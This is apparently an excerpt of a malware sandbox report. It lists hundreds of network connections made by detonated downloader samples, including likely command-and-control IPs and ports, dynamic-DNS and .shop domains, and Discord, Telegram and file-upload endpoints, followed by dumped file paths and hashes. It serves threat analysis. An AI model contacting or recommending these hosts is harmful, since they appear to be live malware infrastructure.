| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| CO | 181.131.217.244:1515 | 3diciembre.con-ip.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| KR | 119.193.158.215:80 | 119.193.158.215 | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 215.158.193.119.in-addr.arpa | udp |
| US | 67.205.154.243:35184 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| RU | 188.119.66.185:443 | tcp | |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.66.119.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | millyscroqwp.shop | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 8.8.8.8:53 | condedqpwqm.shop | udp |
| US | 8.8.8.8:53 | evoliutwoqm.shop | udp |
| US | 8.8.8.8:53 | stagedchheiqwo.shop | udp |
| US | 8.8.8.8:53 | JzyWtlVaDZyw.JzyWtlVaDZyw | udp |
| US | 8.8.8.8:53 | blank-3st7o.in | udp |
| CN | 119.23.208.137:60001 | tcp | |
| US | 8.8.8.8:53 | bgteamtestapp.azurewebsites.net | udp |
| US | 8.8.8.8:53 | stamppreewntnq.shop | udp |
| US | 52.173.134.115:80 | bgteamtestapp.azurewebsites.net | tcp |
| US | 8.8.8.8:53 | caffegclasiqwp.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| DE | 193.161.193.99:35184 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 115.134.173.52.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | www.seetrol.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| KR | 139.150.75.206:80 | www.seetrol.com | tcp |
| FR | 142.250.74.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.75.150.139.in-addr.arpa | udp |
| KR | 3.36.173.8:50500 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| CO | 181.131.217.244:1515 | 3diciembre.con-ip.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 67.205.154.243:35184 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| IR | 5.234.67.61:40500 | tcp | |
| SY | 95.212.73.0:40500 | udp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 142.250.179.74:443 | content-autofill.googleapis.com | tcp |
| US | 67.205.154.243:35184 | tcp | |
| KZ | 92.47.143.122:40500 | udp | |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 163.181.154.238:443 | ldcdn.ldmnq.com | tcp |
| PK | 210.56.13.114:80 | 210.56.13.114 | tcp |
| NL | 190.2.142.115:80 | download.emailorganizer.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| YE | 134.35.104.95:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| US | 52.173.134.115:443 | bingwallpaper.microsoft.com | tcp |
| US | 13.107.246.64:443 | bingwallpaperimages.azureedge.net | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| CO | 181.131.217.244:1515 | newstaticfreepoint24.ddns-ip.net | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| AO | 102.219.187.80:40500 | udp | |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| FR | 142.250.179.74:443 | content-autofill.googleapis.com | tcp |
| CN | 8.134.170.90:7777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 67.205.154.243:35184 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| IR | 2.185.189.167:40500 | udp | |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | 233.54.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| FR | 142.250.75.234:443 | ajax.googleapis.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 185.199.109.153:443 | lipis.github.io | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 185.199.109.153:443 | lipis.github.io | tcp |
| CN | 221.231.39.69:80 | windriversfiles.imeitools.com | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| DZ | 41.102.19.3:40500 | udp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| UZ | 217.30.162.244:40500 | tcp | |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| GB | 184.25.193.234:443 | www.microsoft.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| IR | 151.241.114.78:40500 | udp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 67.205.154.243:35184 | tcp | |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| RU | 83.239.55.170:40500 | udp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| RU | 188.119.66.185:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| HK | 154.92.19.29:1231 | 154.92.19.29 | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| IR | 5.134.199.85:40500 | udp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 67.205.154.243:35184 | tcp | |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 3.5.27.45:443 | bbuseruploads.s3.amazonaws.com | tcp |
| YE | 46.161.245.208:40500 | udp | |
| N/A | 127.0.0.1:55035 | tcp | |
| N/A | 127.0.0.1:55051 | tcp | |
| N/A | 127.0.0.1:55064 | tcp | |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| GB | 104.86.110.120:443 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| US | 20.42.65.90:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 20.140.56.69:443 | fp-afd.azurefd.us | tcp |
| N/A | 127.0.0.1:55069 | tcp | |
| N/A | 127.0.0.1:55080 | tcp | |
| N/A | 127.0.0.1:55110 | tcp | |
| UZ | 83.222.7.85:40500 | udp | |
| US | 172.202.64.254:443 | arc-ring.msedge.net | tcp |
| US | 52.123.128.254:443 | dual-s-ring.msedge.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| YE | 134.35.205.29:40500 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 38.224.37.24:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| IR | 185.80.102.252:40500 | udp | |
| DE | 193.161.193.99:35184 | tcp | |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| RU | 91.240.118.204:8000 | 91.240.118.204 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| UZ | 89.236.217.71:40500 | udp | |
| RU | 94.198.55.181:4337 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| MX | 189.133.187.71:40500 | udp | |
| GB | 142.250.187.195:443 | beacons.gcp.gvt2.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 172.16.16.140:40500 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| SG | 216.107.138.162:40500 | udp | |
| US | 67.205.154.243:35184 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| US | 54.231.203.81:80 | pentestfiles.s3.amazonaws.com | tcp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| UZ | 217.30.162.37:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| YE | 46.161.233.39:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| GB | 2.18.27.153:443 | metadata.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 198.163.204.6:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| RU | 188.119.66.185:443 | tcp | |
| NL | 31.214.157.206:2024 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| UZ | 45.150.26.122:40500 | tcp | |
| UZ | 90.156.163.98:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| CA | 35.183.28.21:80 | status.mycompliancereports.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| IR | 5.232.155.0:40500 | udp | |
| US | 3.165.224.162:443 | d2e5gvivzj4g90.cloudfront.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| PK | 202.70.150.106:40500 | udp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| IR | 188.215.221.55:40500 | udp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | home.sevjs17sr.top | udp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| UZ | 89.236.219.80:40500 | udp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| IR | 89.219.115.156:40500 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| KZ | 5.251.47.42:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| UZ | 89.249.62.7:40500 | udp | |
| US | 216.239.36.21:443 | virustotal.com | tcp |
| US | 216.239.36.21:443 | virustotal.com | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 216.239.36.21:80 | virustotal.com | tcp |
| US | 216.239.36.21:80 | virustotal.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| US | 216.239.36.21:443 | virustotal.com | tcp |
| YE | 178.130.103.42:40500 | udp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| SY | 82.137.218.134:40500 | udp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| UZ | 185.203.237.215:40500 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 67.205.154.243:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| IR | 85.185.237.83:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| RU | 188.119.66.185:443 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| IR | 91.185.130.166:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| IR | 93.119.90.81:40500 | udp | |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| IR | 93.118.99.152:40500 | udp | |
| DE | 193.161.193.99:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| IR | 2.191.14.149:40500 | udp | |
| KZ | 46.36.149.47:40500 | tcp | |
| GB | 20.26.156.215:80 | github.com | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| UZ | 90.156.160.6:40500 | udp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| UZ | 195.158.18.194:40500 | udp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 67.205.154.243:35184 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| IR | 2.181.218.207:40500 | udp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 90.189.250.159:40500 | udp | |
| IR | 2.190.67.184:40500 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| UZ | 87.237.234.159:40500 | udp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| IE | 20.190.159.2:443 | login.microsoftonline.com | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 67.205.154.243:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| IR | 5.219.134.102:40500 | udp | |
| NL | 31.214.157.206:2024 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| GB | 104.86.110.120:443 | tcp | |
| KZ | 82.200.228.118:40500 | udp | |
| YE | 134.35.158.149:40500 | udp | |
| KZ | 5.251.234.88:40500 | udp | |
| UZ | 90.156.160.10:40500 | udp | |
| MX | 187.223.139.73:40500 | udp | |
| KZ | 92.46.228.246:40500 | udp | |
| IR | 2.177.228.237:40500 | udp | |
| UZ | 90.156.162.48:40500 | udp | |
| NE | 41.138.38.164:40500 | udp | |
| IR | 80.250.196.82:40500 | udp | |
| SY | 88.86.12.98:40500 | udp | |
| UZ | 89.249.62.14:40500 | udp | |
| UZ | 90.156.160.30:40500 | udp |
Files
memory/5032-2-0x0000000000500000-0x0000000000508000-memory.dmp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
| MD5 | 760370c2aa2829b5fec688d12da0535f |
| SHA1 | 269f86ff2ce1eb1eeed20075f0b719ee779e8fbb |
| SHA256 | a3a6cde465591377afc5f656f72a00799398fd2541b60391bcb8f62b8f8cace3 |
| SHA512 | 1e63051694056ffcd3aa22edb2bef3bb30401edc784b82101f5dc7f69756b994e84e309a13bdb64b6e92516e895648ee34598de70e8882569d79dbfdab61a847 |
memory/1204-10-0x0000000000400000-0x000000000068B000-memory.dmp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
| MD5 | 51aa89efb23c098b10293527e469c042 |
| SHA1 | dc81102e0c1bced6e1da055dab620316959d8e2a |
| SHA256 | 780f11f112fcf055a2f9d6b12ce3750aed7720b85528a7adaf114067446f4292 |
